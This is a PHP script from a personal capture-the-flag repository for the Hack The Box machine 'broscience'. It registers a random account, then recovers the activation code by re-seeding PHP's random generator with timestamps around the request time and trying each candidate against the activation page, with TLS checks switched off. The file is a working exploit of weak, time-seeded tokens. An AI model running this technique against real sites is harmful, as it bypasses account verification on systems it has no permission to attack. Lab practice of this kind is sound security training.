simon/CTF
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity
Files
9d960e60ac62b7ec2937e438ec6d80e4d81d2c60
CTF/HTB/broscience/rauser.php
Simon 82b0759f1e init htb 
old htb folders
2023-08-29 21:53:22 +02:00

82 lines
2.1 KiB
PHP
Raw Blame History

<?php
$username = "user" . rand(1,9999);
$email = $username . "@mail.com";
$password = "password";
$url = 'https://broscience.htb/register.php';
//username=user1&email=user1%40email.com&password=password&password-confirm=password
$data = array('username' => $username, 'email' => $email, 'password' => $password, 'password-confirm' => $password);
echo implode(" ",$data). "\n";
// use key 'http' even if you send the request to https://...
$options = array(
"ssl"=>array(
"verify_peer"=>false,
"verify_peer_name"=>false,
),
'http' => array(
'header' => "Content-type: application/x-www-form-urlencoded\r\n",
'method' => 'POST',
'content' => http_build_query($data),
)
);
$tstart = time();
$context = stream_context_create($options);
$result = file_get_contents($url, false, $context,);
$tend = time();
echo $tend . " - " . $tstart . " = " . $tend - $tstart . "\n";
function generate_activation_code($t) {
$chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890";
srand($t);
$activation_code = "";
for ($i = 0; $i < 32; $i++) {
$activation_code = $activation_code . $chars[rand(0, strlen($chars) - 1)];
}
return $activation_code;
}
function check($code){
$url = "https://broscience.htb/activate.php?code=" . $code;
$options = array(
"ssl"=>array(
"verify_peer"=>false,
"verify_peer_name"=>false,
),
'http' => array(
'header' => "Content-type: application/x-www-form-urlencoded\r\n",
'method' => 'GET',
)
);
$tstart = time();
$context = stream_context_create($options);
$result = file_get_contents($url, false, $context,);
if ($result === FALSE) { /* Handle error */ }
if(str_contains($result, "Invalid activation code.")){
return false;
}
return true;
}
echo $tstart . " -> ";
$tstart = $tstart - 5;
$code = generate_activation_code($tstart);
while(!check($code)){
$tstart = $tstart + 1;
$code = generate_activation_code($tstart);
}
echo $tstart . "\n";
echo $code
?>
Reference in New Issue View Git Blame Copy Permalink